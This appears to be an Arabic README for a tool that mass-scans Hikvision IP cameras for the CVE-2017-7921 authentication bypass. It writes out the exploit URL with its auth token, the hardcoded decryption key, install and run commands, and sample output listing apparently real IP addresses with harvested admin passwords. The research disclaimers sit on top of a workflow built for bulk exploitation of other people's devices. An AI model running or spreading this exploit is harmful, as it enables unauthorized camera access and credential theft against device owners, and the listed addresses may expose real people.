
يستخدم لاختبار ثغرة CVE-2017-7921 في Hikvision بسرعة باستخدام FOFA، كما يوفر اسم المستخدم وكلمة المرور لتسجيل الدخول، ويخرج ملف JSON.
إعلان أمني: هذه الأداة مخصصة للبحث الأمني المصرح به والتحقق من الثغرات فقط
تنبيه مهم: استخدام هذه الأداة يعني موافقتك على الشروط التالية
يتبع هذا المشروع سياسة أبحاث الأمان في GitHub ومعايير الإفصاح الخاصة بـ مركز استجابة أمان هايكفيجن.
أداة فحص جماعي والتحقق من ثغرة تجاوز المصادقة CVE-2017-7921 في كاميرات IP من هايكفيجن، مع دعم فك تشفير ملفات التكوين تلقائياً واستخراج بيانات الاعتماد.
git clone https://github.com/[اسم المستخدم الخاص بك]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0
أنشئ مجلد zc/ في دليل الأداة، وضع قائمة الأجهزة بصيغة JSON (كل سطر يحتوي على كائن جهاز):
mkdir zc
مثال على الملف: devices_2025.json
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
وصف الحقول:
python batch_decrypt.py
════════════════════════════════════════════════════════════════════════════════
أداة الفحص الجماعي لثغرة ملف تكوين كاميرات هايكفيجن
════════════════════════════════════════════════════════════════════════════════
الملفات JSON المتاحة:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45,678 بايت)
════════════════════════════════════════════════════════════════════════════════
يرجى اختيار رقم الملف: 1
تم اختيار الملف: devices_2025.json
جارٍ تحميل بيانات الأجهزة...
إجمالي الأجهزة المطلوب فحصها: 2000
يرجى إدخال عدد الخيوط المتزامنة (الافتراضي: 5): 10
عدد الخيوط المتزامنة: 10
بدأ الفحص...
إجمالي الأجهزة التي تم فحصها: 2000
عدد الأجهزة المصابة بالثغرة: 127
تم حفظ الأجهزة المصابة في: vulnerable_devices.json
بعد انتهاء الفحص، يتم إنشاء vulnerable_devices.json يحتوي على معلومات جميع الأجهزة المخترقة.
نموذج الإخراج:
[
{
"url": "http://109.50.152.186",
"config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
"username": "admin",
"password": "123456",
"city": "Lisbon",
"country": "PT",
"org": "ISP Telecom",
"status": "success"
}
]
/System/configurationFile?auth=YWRtaW46MTEK بيانات اعتماد ثابتة مشفرة279977f62f6cfd2d91cd75b889ce0c9a مضمن بشكل ثابت في البرنامج الثابت0x73, 0x8B, 0x55, 0x44)هذا البرنامج مخصص للبحث الأمني المصرح به والأغراض التعليمية فقط. يجب على المستخدم ضمان الامتثال لجميع القوانين المعمول بها.
آخر تحديث: 2025-01-29 | الإصدار: v1.0.0 | CVE: CVE-2017-7921
| الحقل | الوصف | إجباري |
|---|
link | عنوان الوصول HTTP/HTTPS للجهاز | ✅ نعم |
city | معلومات المدينة | ❌ لا |
country | رمز الدولة | ❌ لا |
org | معلومات المنظمة/مزود الخدمة | ❌ لا |